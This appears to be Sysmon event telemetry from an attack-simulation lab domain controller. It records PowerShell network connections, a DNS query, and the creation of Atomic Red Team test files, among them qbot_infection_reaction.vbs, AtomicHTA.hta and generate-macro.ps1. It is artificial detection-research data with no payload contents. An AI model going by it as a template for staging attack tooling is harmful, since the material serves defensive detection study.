{"EventTime":"2020-08-01 07:59:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4730,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:03.361\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50168\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:03.361","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50168","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4731,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:03.635\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50169\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:03.635","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50169","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4732,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.117\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nQueryName: psg-prod-eastus.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 psg-prod-eastus.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.117","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","QueryName":"psg-prod-eastus.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 psg-prod-eastus.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4733,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.125\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50170\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.125","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50170","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4734,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:06.471\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\atomic-hello.exe\r\nCreationUtcTime: 2020-08-01 07:59:06.471","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:06.471","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\atomic-hello.exe","CreationUtcTime":"2020-08-01 07:59:06.471","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4735,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.471\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Argonaut.ps1\r\nCreationUtcTime: 2020-08-01 07:59:06.471","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.471","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Argonaut.ps1","CreationUtcTime":"2020-08-01 07:59:06.471","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4736,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.471\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Cyclotron.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.471","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.471","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Cyclotron.bat","CreationUtcTime":"2020-08-01 07:59:06.471","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4737,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.486\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.471","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.486","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.bat","CreationUtcTime":"2020-08-01 07:59:06.471","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4738,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.486\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.ps1\r\nCreationUtcTime: 2020-08-01 07:59:06.486","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.486","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.ps1","CreationUtcTime":"2020-08-01 07:59:06.486","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4739,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.486\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Fission.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.486","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.486","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Fission.bat","CreationUtcTime":"2020-08-01 07:59:06.486","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4740,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.486\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Plutonium.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.486","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.486","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Plutonium.bat","CreationUtcTime":"2020-08-01 07:59:06.486","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4741,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.486\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Reactor.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.486","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.486","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Reactor.bat","CreationUtcTime":"2020-08-01 07:59:06.486","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4742,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.486\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\dragonstail_benign.ps1\r\nCreationUtcTime: 2020-08-01 07:59:06.486","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.486","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\dragonstail_benign.ps1","CreationUtcTime":"2020-08-01 07:59:06.486","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4743,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.502\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\qbot_infection_reaction.vbs\r\nCreationUtcTime: 2020-08-01 07:59:06.502","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.502","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\qbot_infection_reaction.vbs","CreationUtcTime":"2020-08-01 07:59:06.502","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4744,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.502\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\AtomicHTA.hta\r\nCreationUtcTime: 2020-08-01 07:59:06.502","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.502","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\AtomicHTA.hta","CreationUtcTime":"2020-08-01 07:59:06.502","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4745,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.518\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\generate-macro.ps1\r\nCreationUtcTime: 2020-08-01 07:59:06.518","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.518","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\generate-macro.ps1","CreationUtcTime":"2020-08-01 07:59:06.518","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4746,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.518\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Labs\\Webinar11062017-Labs.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.518","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.518","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Labs\\Webinar11062017-Labs.bat","CreationUtcTime":"2020-08-01 07:59:06.518","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4747,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.518\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Misc\\Discovery.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.518","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.518","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Misc\\Discovery.bat","CreationUtcTime":"2020-08-01 07:59:06.518","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
